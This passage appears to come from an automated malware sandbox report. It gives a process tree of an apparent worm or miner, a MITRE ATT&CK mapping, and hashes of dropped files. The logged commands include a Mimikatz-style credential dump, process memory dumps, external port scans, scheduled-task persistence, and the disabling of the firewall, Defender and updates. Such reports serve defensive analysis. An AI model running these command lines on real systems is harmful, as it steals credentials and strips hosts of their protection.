    3⤵
    - System Location Discovery: System Language Discovery
    PID:5068
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:4772
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4996
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4176
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe /S
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3624
- - C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe
    C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3632
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4892
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        
        PID:4388
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3652
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        
        PID:2968
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:900
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5052
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:2680
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:464
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:3888
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2900
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:3668
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3384
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3584
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:4752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ppgkyibiq\ihnqsqiep\Scant.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1696
- - C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe
    C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ppgkyibiq\ihnqsqiep\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1748
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\ppgkyibiq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ppgkyibiq\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  PID:1756
- - C:\Windows\ppgkyibiq\Corporate\vfshost.exe
    C:\Windows\ppgkyibiq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:800
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yllebvbbl" /ru system /tr "cmd /c C:\Windows\ime\yittybr.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2328
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "yllebvbbl" /ru system /tr "cmd /c C:\Windows\ime\yittybr.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1308
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fmptikrhb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3536
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "fmptikrhb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4160
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "blhbujgqb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1076
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "blhbujgqb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1440
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4376
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1476
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:5000
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4524
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:3668
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3408
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4532
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4196
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2440
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1832
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2004
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3064
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    - System Location Discovery: System Language Discovery
    PID:692
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:4928
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3944
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2584
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  PID:4388
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:4428
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 780 C:\Windows\TEMP\ppgkyibiq\780.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3276
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1476
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    PID:4504
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      System Location Discovery: System Language Discovery
      PID:5068
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5024
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:904
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:4444
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3300
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4052
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      System Location Discovery: System Language Discovery
      PID:3164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3792
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:3408
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4432
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:2900
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2404
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:3984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3248
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4312
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  PID:2412
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 388 C:\Windows\TEMP\ppgkyibiq\388.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3012
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2064 C:\Windows\TEMP\ppgkyibiq\2064.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3652
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2488 C:\Windows\TEMP\ppgkyibiq\2488.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2256
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2672 C:\Windows\TEMP\ppgkyibiq\2672.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1268
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2812 C:\Windows\TEMP\ppgkyibiq\2812.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4432
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2156 C:\Windows\TEMP\ppgkyibiq\2156.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3968
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3756 C:\Windows\TEMP\ppgkyibiq\3756.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2192
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3924 C:\Windows\TEMP\ppgkyibiq\3924.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1728
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3992 C:\Windows\TEMP\ppgkyibiq\3992.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4568
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 4072 C:\Windows\TEMP\ppgkyibiq\4072.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2228
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2168 C:\Windows\TEMP\ppgkyibiq\2168.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1368
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2668 C:\Windows\TEMP\ppgkyibiq\2668.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5004
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3376 C:\Windows\TEMP\ppgkyibiq\3376.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3704
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2144 C:\Windows\TEMP\ppgkyibiq\2144.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3968
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3080 C:\Windows\TEMP\ppgkyibiq\3080.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4128
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2400 C:\Windows\TEMP\ppgkyibiq\2400.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3380
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 64 C:\Windows\TEMP\ppgkyibiq\64.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:264
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\ppgkyibiq\ihnqsqiep\scan.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2320
- - C:\Windows\ppgkyibiq\ihnqsqiep\vmlbqggye.exe
    vmlbqggye.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:1968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3580
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3936
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3704
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1440

C:\Windows\SysWOW64\lqvjma.exe
C:\Windows\SysWOW64\lqvjma.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3256

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\yittybr.exe
1⤵
PID:2340
- C:\Windows\ime\yittybr.exe
  C:\Windows\ime\yittybr.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1840

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F
1⤵
PID:4124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4688
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F
  2⤵
  PID:4428

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
1⤵
PID:2584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4388
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
  2⤵
  PID:2540

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\yittybr.exe
1⤵
PID:6316
- C:\Windows\ime\yittybr.exe
  C:\Windows\ime\yittybr.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:6340

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F
1⤵
PID:6248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:6472
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F
  2⤵
  PID:6424

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
1⤵
PID:6280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:6468
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
  2⤵
  PID:6272

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\lntjubmbe\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\TEMP\ppgkyibiq\2064.dmp

Filesize
4.2MB

MD5
43a681adbc4eb8606ba8a0760b8b305d

SHA1
5fb65c234eaffb31e8cd1f3b3e582ff1a74d5bba

SHA256
680e0b071c083fd26e7937def5b04b167c7d5f6e0bd0de37e991cefb71b1abc3

SHA512
0369ca162ffc728ed38a2f0c365b75a23ac2cb32eaf55a9265095257fd9ba7792a0204dadd16dc54900efa20d16954ac3845e207106325a924a9f2172c2020e1

Download Submit
C:\Windows\TEMP\ppgkyibiq\2156.dmp

Filesize
814KB

MD5
f26bec3c8ae6a834db43ab48b4aefeeb

SHA1
95c645e0993b2876731f1b7edc114b9724b15d26

SHA256
197f8e8350808c5ed12c7d7c2ef447b5960b7a1f501d4f9ee89efb42bea2e7f1

SHA512
64db3c8b5a5978253a773d7ca1b8106a6d862f0b211ba6aaa23831725078e2f3fc55f769f043f8f73225817d7fb1fb233f866fe8a98fe781d54012e6f91bfa73

Download Submit
C:\Windows\TEMP\ppgkyibiq\2168.dmp

Filesize
25.9MB

MD5
c350f162343726c0fcddb4dc379fa4d8

SHA1
2bca432aa04f195cfed40549a4b53115f7250362

SHA256
33a80a91c8d4c0d8c9186bdf341bbc43077c4f11e26d96d43c8bfaa2de130cac

SHA512
83be501696da97d33a00dff18c7b9ef40831860f266ab69139ea0ce6f57907571e735d8617c3bb223ea0e0a579e04e8e057ff1e339f115ef4990cda4af6f7858

Download Submit
C:\Windows\TEMP\ppgkyibiq\2488.dmp

Filesize
3.9MB

MD5
2361d79f8bb09388a468ae71fcaffb26

SHA1
30213c264bdbefdea5654eed37396873ea30ddd9

SHA256
aa5f8c3b5c45baddfe4de1ac377aefe53cc5a2b982aa1c125d2b19c87bfe2c24

SHA512
d8183b365d44e3ccf3e2e98849ac1911777b3ff81ee43c74eb061f9f15f62504583e06ca947789104f55a8e06d17f7b40e9e41e76ba8bec3be439dced8165bd2

Download Submit
C:\Windows\TEMP\ppgkyibiq\2668.dmp

Filesize
1.2MB

MD5
86a33f0263a877dce1cf56062f6a6322

SHA1
a6e90664a5000677d9f4e935de67f6fa3d369029

SHA256
db527304934f292498665b12d12e965ea7938efdedc80d5b5d9218940508b413

SHA512
054a011360c0a018531effdd02aaeab43ba4cdd627fab3aa198762e356f706d19b1bad27a043b84000b25369a57516735abf21a5fc334c3b5946cb8c2b962741

Download Submit
C:\Windows\TEMP\ppgkyibiq\2672.dmp

Filesize
2.9MB

MD5
2c9d65e321af5dbfba9bd2840125d9c3

SHA1
7a496167fd18e00bd4b461c8f65997b2391d8465

SHA256
bc6fa9dd05fd72c9e8b2123211d795dca2abce6fc0a89a945dd3772d62019e91

SHA512
67a571348ae03e467a70d5e5ed6e3ee6d221843896a0120eee96347b0ec0c0525b88519d2ae5b5eed687c1cb20a579ec21d14c244a45b3404c4194507fa55e10

Download Submit
C:\Windows\TEMP\ppgkyibiq\2812.dmp

Filesize
7.5MB

MD5
33b255d8472832d7f8802f70fb6e4fe7

SHA1
e8bed195c58cf1d03459ecf3fd96fb2e1d4582a1

SHA256
e4a0271b1364f956957b41dd885324d84f6185a38c115923d40549a0cd571d58

SHA512
9296843d0ce6394c6271e77bce828f49df42a4db7166f4e7669b491e5bbf47aa5fb9036008eccd8fde925c862e7d2527d0c37ec411edee348316352872e1ef57

Download Submit
C:\Windows\TEMP\ppgkyibiq\3376.dmp

Filesize
8.6MB

MD5
3f8256812391caafad542308bfc0c572

SHA1
34fd566ec6bb7e1376a2ea389ec9c2709b4e3f8a

SHA256
799e32125ed13652e05a3a0168e48085f284f9699d5149f38898faf1466cdc38

SHA512
77bf09dc9a2256c8f7920cd46eda28d0ee77bdb70ee332603eb78586971d2eba05e1051f3173ce27521da2ed8900ea4bd44e1e20382b75e6cad0cbf421ce0cce

Download Submit
C:\Windows\TEMP\ppgkyibiq\3756.dmp

Filesize
2.5MB

MD5
9731a2568fa9bdafe1199f19f5a6b4c9

SHA1
a5dc22494410ad22b61d7ae15fb7378f559ae03c

SHA256
